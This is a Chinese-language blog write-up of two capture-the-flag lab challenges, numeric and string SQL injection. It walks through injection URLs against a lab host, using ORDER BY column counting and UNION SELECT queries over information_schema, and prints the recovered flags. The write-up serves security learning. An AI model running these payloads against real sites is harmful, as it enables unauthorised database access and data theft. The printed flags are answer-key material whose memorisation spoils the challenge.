安鸾SQL系列之数字字符串
涂寐 Lv5

声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
本文首发于 涂寐’s Blogs:https://0xtlu.github.io/article/81e90e43.html

SQL数字型GET注入01

1
2
3
漏洞URL:http://47.103.94.191:8001/bug/sql_injection/sql_num.php

提示:flag在数据库里
1
2
3
4
5
6
7
8
9
10
11
12
13
14
# 测类型--数字型
http://47.103.94.191:8001/bug/sql_injection/sql_num.php?id=1 and 1=1&submit=submit
http://47.103.94.191:8001/bug/sql_injection/sql_num.php?id=1 and 1=2&submit=submit
# 测字段--3
http://47.103.94.191:8001/bug/sql_injection/sql_num.php?id=1 order by 3&submit=submit
http://47.103.94.191:8001/bug/sql_injection/sql_num.php?id=1 order by 4&submit=submit
# 获取当前所在数据库--dwvs
http://47.103.94.191:8001/bug/sql_injection/sql_num.php?id=-1 union select 1,2,database()&submit=submit
# 查dwvs数据库下所有表--flag
http://47.103.94.191:8001/bug/sql_injection/sql_num.php?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='dwvs'&submit=submit
# flag表查字段--id、flag
http://47.103.94.191:8001/bug/sql_injection/sql_num.php?id=-1 union select 1,2,group_concat(COLUMN_NAME) from information_schema.columns where table_name='flag'&submit=submit
# 查flag字段值--flag{05486400c4ac17fef478f73504934212}
http://47.103.94.191:8001/bug/sql_injection/sql_num.php?id=-1 union select 1,2,flag from dwvs.flag&submit=submit

SQL字符型注入

1
2
3
漏洞URL:http://47.103.94.191:8005//bug/sql_injection/sql_string.php?title=1&submit=submit

提示:flag在数据库里面
  1. ‘ and ‘1’=’1 测类型

    1
    http://47.103.94.191:8005//bug/sql_injection/sql_string.php?title=2' and '1'='1&submit=submit
  2. order by 测字段数

    1
    http://47.103.94.191:8005//bug/sql_injection/sql_string.php?title=2' order by 4%23&submit=submit

    image

  3. 获取所有数据库

    1
    http://47.103.94.191:8005//bug/sql_injection/sql_string.php?title=1' union select 1,2,group_concat(table_schema) from information_schema.tables%23&submit=submit
  4. dwvs数据库所有表

    1
    http://47.103.94.191:8005//bug/sql_injection/sql_string.php?title=2' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='dwvs'%23&submit=submit

    image

  5. 查flag表下字段

    1
    http://47.103.94.191:8005//bug/sql_injection/sql_string.php?title=2' union select 1,2,group_concat(COLUMN_NAME) from information_schema.columns where table_name='flag'%23&submit=submit

    image

  6. 取flag{3fac9e7cf81d710fd1a15f011d60739f}

    1
    http://47.103.94.191:8005//bug/sql_injection/sql_string.php?title=2' union select 1,2,flag from dwvs.flag%23&submit=submit

    image

 评论